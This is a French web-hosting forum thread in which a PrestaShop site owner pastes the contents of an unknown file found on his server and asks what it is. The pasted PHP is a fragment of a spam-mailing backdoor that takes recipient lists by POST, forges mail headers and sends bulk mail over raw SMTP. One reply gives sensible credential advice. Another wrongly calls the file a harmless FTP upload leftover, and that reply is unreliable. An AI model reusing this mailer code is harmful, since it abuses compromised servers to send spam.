Jump to content

drôle de fichier sur mon site (fichier virus!)


thierry2

Recommended Posts

Bonjour,voila que j'ai un nouveau fichier il ce nome .pureftpd-rename.4573.88e906e1??dans la racine du site.

Depuis vendredi j'ai un autre site attaqué par ce fichier?? mon site ralenti impossible d'ouvrir des pages?

Alors ouvrez bien vos yeux car j'ai peur que prestashop soit visé .j'ai ouvert le fichier avec texte edite.Qui peut me dire c'est quoi ce ce fichier,comment faire pour protégé .

 

 

10) { fclose($sock); return 0; } $hostSMTP = substr($mailAddr, strpos($mailAddr, "@") + 1); $mxHost; if(isset($mx_hash[$hostSMTP])) { $mxHost = $mx_hash[$hostSMTP]; }else { $mxHostes; if(!getmxrr/*getmxrrStub*/($hostSMTP, $mxHostes)) { ++$countAllFailed; continue; } $mx_count = count($mxHostes); if($mx_count == 0) { ++$countAllFailed; continue; } $mx_hash[$hostSMTP] = $mxHostes[0]; $mxHost = $mxHostes[0]; } $random_num = rand(10000, 99999); $SEND = "Received: (qmail $random_num invoked by uid 33); ".gmdate("d M Y H:i:s O")."\r\n"; $SEND .= "Date: ".gmdate("d M Y H:i:s O")." \r\n"; $SEND .= "Message-ID: <".gmdate("YmdHis").".$random_num.qmail@".$serv_name.">\r\n"; $SEND .= 'Subject: '.$theme."\r\n"; $SEND .= "Reply-To: $from\r\n"; $SEND .= "MIME-Version: 1.0\r\n"; $SEND .= "Content-Type: text/html; charset=\"iso-8859-1\"\r\n"; $SEND .= "Content-Transfer-Encoding: 8bit\r\n"; $SEND .= "From: <$from>\r\n"; $SEND .= "To: $mailAddr\r\n"; $SEND .= "X-Priority: 3\r\n\r\n"; $SEND .= $body[array_rand($body)]."\r\n"; if($mailS->send_email($mxHost, $from, $mailAddr, $SEND, $serv_name)) { $countAllFailed = 0; ++$countSuccess; }else ++$countAllFailed; } if(!fwrite($sock, "$countSuccess")) { fclose($sock); return $countReWork; } $countReWork += 1; } fclose($sock); return $countReWork; } // if(isset($_GET[id]) && isset($_GET[ipAddr] && isset($_GET[serv_name]) else if(isset($_POST[job]) && isset($_POST[from]) && isset($_POST) && isset($_POST[serv_name])) { $serv_name = $_POST[serv_name]; $job_set = explode(" ", $_POST['job']); $job_set_count = count($job_set); if($job_set_count == 0) { echo "job(explode) - error"; exit(); } $from = $_POST[from]; $theme = $_POST; $random_num = rand(10000, 99999); $add_header = "Received: (qmail $random_num invoked by uid 33); ".gmdate("d M Y H:i:s O")."\r\n"; $add_header .= "Date: ".gmdate("d M Y H:i:s O")." \r\n"; $add_header .= "Message-ID: <".gmdate("YmdHis").".$random_num.qmail@".$serv_name.">\r\n"; $add_header .= 'Subject: '.$theme."\r\n"; $add_header .= "Reply-To: $from\r\n"; $add_header .= "MIME-Version: 1.0\r\n"; $add_header .= "Content-Type: text/html; charset=\"iso-8859-1\"\r\n"; $add_header .= "Content-Transfer-Encoding: 8bit\r\n"; $add_header .= "From: <$from>\r\n"; $add_header .= "To: $mailAddr\r\n"; $add_header .= "X-Priority: 3\r\n\r\n"; $i = 0; $good = 0; $bad = 0; foreach($job_set as $mailAddr) { ++$i; if(mail($mailAddr, $theme, $body[array_rand($body)], $add_header)) { ++$good; $bad = 0; } else { ++$bad; } if(2*$bad > $job_set_count) exit(); } echo "job_completed"; } // else if(isset($_POST['job']) && isset($_POST['serv_name'])) return 0; } // function execSend() class SMTPmail { var $m_sockServ = false; var $m_lastMsg = ""; function read_line() { $line = fread($this->m_sockServ, 1024); if(strlen($line) < 3) return false; return substr($line, 0, 3); return false; } function send_command($code, $cmd) { fwrite($this->m_sockServ, $cmd."\r\n"); $line = $this->read_line(); if($line == false) { $this->m_lastMsg = ""; return false; }else { $this->m_lastMsg = "$line"; return $line == $code; } } function crlf_encode($data) { $data .= "\n"; $data = str_replace("\n", "\r\n", str_replace("\r", "", $data)); $data = str_replace("\n.\r\n", "\n. \r\n", $data); return $data; } function connect($hostname) { $this->m_sockServ = fsockopen($hostname, 25); return $this->m_sockServ != 0; } function handle_email($from, $to, $data, $local_addr) { if( !$this->send_command(250, "HELO ".$local_addr) || !$this->send_command(250, "MAIL FROM:<$from>") || !$this->send_command(250, "RCPT TO:<$to>") || !$this->send_command(354, "DATA") || !fwrite($this->m_sockServ, $data) || !$this->send_command(250, ".") || !$this->send_command(221, "QUIT")) { return false; } return true; } function send_email($hostname, $from, $to, $data, $local_addr) { if(!$this->connect($hostname)) { echo "cant connect to SMTP\n"; return false; } $ret = false; $code = $this->read_line(); if($code == "220") { $data = $this->crlf_encode($data); $ret = $this->handle_email($from, $to, $data, $local_addr); } fclose($this->m_sockServ); return $ret; } } if($res = execSend()) { }else { } ?>

Edited by thierry2 (see edit history)
Link to comment
Share on other sites

Salut thierry2,

 

Certains logiciels espions peuvent récupérer les identifiants du client FTP d'un ordinateur.

Il est alors facule pour ses créateurs d'atteindre ton serveur FTP.

Premiers conseil :

- change ton mot de passe FTP

- nettoie ton ordinateur avec un anti-malware

Et par la suite, dans l'idéal, ne stocke pas ton mot de passe dans ton client FTP mais saisie le à chaque fois.

Link to comment
Share on other sites

Bonjour thierry2,

 

ça arrive quand tu utilises FileZilla, par exemple, et que tu as eu un soucis de connexion lors d'un envoi.

 

PureFTPD est un serveur FTP; tu peux voir par exemple ce genre de réponse dans le listing des messages serveurs de FileZilla: Réponse : 220 ProFTPD 1.3.3a Server (Debian)

 

:)

Link to comment
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now
×
×
  • Create New...